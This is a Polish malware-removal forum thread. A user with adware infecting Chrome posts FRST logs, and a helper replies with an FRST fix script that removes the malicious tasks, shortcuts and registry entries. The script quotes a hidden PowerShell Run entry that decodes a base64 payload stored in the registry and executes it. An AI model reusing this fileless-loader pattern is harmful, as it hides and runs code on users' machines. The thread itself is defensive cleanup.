godlo9888 utworzono 24 czerwca 2017 utworzono 24 czerwca 2017 Witam Wczoraj zainfekowałem komputer, od razu pobrałem adwcleaner - niby coś znalazł, restart, niby wszystko dobrze, a tu po chwili na pulpicie tworzyły się jakieś rosyjskie skróty, w przeglądarce pornograficzne reklamy itd. Mam adblocka, nawet ten sobie nie radził z tym. To postanowiłem w trybie awaryjnym przeskanować adwcleanerem, znowu coś wykrył i usunął. Uruchomiłem normalnie system, co się okazało że nic nie dało, reklamy zostały. Pobrałem mbam, którym nie mogę przeskanować komputera bo w różnych momentach się skan "zawiesza", a jak chce coś zrobić to zostaje restart bo robi się czarny ekran ( w różnych momentach się zawiesza, raz autostart, raz jakiś $recyclebin plik). To postanowiłem pobrać combofix, ten sobie poradził z usunięciem wszystkiego, ale nadal zostały reklamy i po restarcie tworzą się rosyjskie zakładki w google chrome i puste reklamy, dosłownie wszędzie, bez wartości puste pola. Wstawiam logi z FRST: i wczorajsze z adwcleaner (teraz skanowałem adw i nic nie wykrył) FRST_24-06-2017 16.31.41.txt Shortcut_24-06-2017 16.31.41.txt Addition_24-06-2017 16.31.41.txt AdwCleaner[C2].txt
Twój_Anioł_Stróż komentarz 24 czerwca 2017 komentarz 24 czerwca 2017 (edytowane) Uruchom FRST. NA klawiaturze naciśnij jednocześnie CTRL+Y.Otworzy się Notatnik - wklej do niego: Cytuj Task: {0059207F-9CD1-4ADC-A884-68D66903DBBF} - System32\Tasks\setupsk => C:\Users\Patryk\AppData\Roaming\setupsk\python\pythonw.exe <==== ATTENTION Task: {17A7B73D-AB1F-4A66-A0B3-8406EE1ECC94} - System32\Tasks\MSI => C:\Users\Patryk\AppData\Roaming\Microsoft\msi.exe <==== ATTENTION C:\Users\Patryk\AppData\Roaming\Microsoft\msi.exe Task: {82935022-2481-46B5-9650-2DA2522EBE86} - System32\Tasks\setupsk_upd => C:\Users\Patryk\AppData\Roaming\SETUPS~1\python\pythonw.exe <==== ATTENTION Task: {E3F1F1B6-F50D-4739-8628-FDF001C7D765} - System32\Tasks\ifgker => C:\Users\Patryk\AppData\Local\ifgker\ifgker.exe <==== ATTENTION ShortcutWithArgument: C:\Users\Patryk\AppData\Local\Microsoft\Start Menu\Вoйти в Интeрнeт.lnk -> C:\Windows\explorer.exe (Microsoft Corporation) -> "hxxp://eqvizin.ru/?utm_source=startlink03&utm_content=9b9ecb220f7b11703ea6292fdcdcdf8b&utm_term=AFC5E2BCF3592201D03D3E0F4E590093&utm_d=20170623" C:\Users\Patryk\AppData\Local\Microsoft\Start Menu\Вoйти в Интeрнeт.lnk FirewallRules: [{7F71A92B-15D9-43EC-B23B-CA870D301ACC}] => (Allow) C:\Users\Patryk\AppData\Local\yc\Application\yc.exe C:\Users\Patryk\AppData\Local\yc\Application\yc.exe RemoveDirectory: C:\Users\Patryk\AppData\Roaming\setupsk RemoveDirectory: C:\Users\Patryk\AppData\Local\ifgker HKU\S-1-5-21-1816448667-2973422257-815294239-1000\...\Run: [{86581E94-8DF5-49C0-9996-75C40A4D2578}] => powershell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass -nop iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String((gp 'HKCU:\Software\Classes\XPHJACIUWZX').PBTOIV))); ShellIconOverlayIdentifiers: [00avg] -> {472083B0-C522-11CF-8763-00608CC02F24} => -> No File GroupPolicy: Restriction <======= ATTENTION HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction <======= ATTENTION HKU\S-1-5-21-1816448667-2973422257-815294239-1000\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction <======= ATTENTION S3 catchme; \??\C:\ComboFix\catchme.sys [X] S3 VGPU; System32\drivers\rdvgkmd.sys [X] C:\Windows\Minidump\*.dmp InternetURL: C:\Users\Patryk\Favorites\Links\Интернет.url -> URL: hxxp://eqvizin.ru/?utm_source=favorites03&utm_content=20c6bbe85a555deeed44597d29168907&utm_term=AFC5E2BCF3592201D03D3E0F4E590093&utm_d=20170623 C:\Users\Patryk\Favorites\Links\Интернет.url EmptyTemp: Na klawiaturze naciśnij jednocześnie CTRL+S. W FRST kliknij na Fix (NAPRAW). Edytowane 24 czerwca 2017 przez Twój_Anioł_Stróż 1
godlo9888 komentarz 24 czerwca 2017 Autor komentarz 24 czerwca 2017 (edytowane) Zrobiłem, wchodzę na yt i nadal to samo. Po kliknięcie tego ruskiego linku obok subskrybuj pobiera się jakiś plik o rozszerzeniu mp4.(wczoraj patrzyłem). Wstawiam screena: EDIT: Reinstall chrome raczej pomógł, dzięki za pomoc! Edytowane 24 czerwca 2017 przez godlo9888
Wciąż szukasz rozwiązania problemu? Napisz teraz na forum!
Możesz zadać pytanie bez konieczności rejestracji - wystarczy, że wypełnisz formularz.